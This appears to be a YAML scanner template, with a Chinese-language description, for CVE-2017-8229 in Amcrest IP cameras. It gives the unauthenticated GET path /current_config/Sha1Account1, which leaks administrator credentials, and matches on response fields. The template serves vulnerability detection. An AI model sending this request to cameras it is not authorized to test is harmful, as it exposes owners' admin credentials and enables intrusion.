id: CVE-2017-8229

info:
  name: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞
  author: zan8in
  severity: critical
  description: |
    Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头，设备允许未经身份验证的攻击者下载管理凭据
    "Amcrest"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/Amcrest/Amcrest%20IP%20Camera%20Web%20Sha1Account1%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E%20CVE-2017-8229.html

rules:
  r0:
    request:
      method: GET
      path: /current_config/Sha1Account1
    expression: response.status == 200 && response.body.bcontains(b'"DevInformation" :') && response.body.bcontains(b'"SerialID" :') && response.body.bcontains(b'"AuthorityList" :')
expression: r0()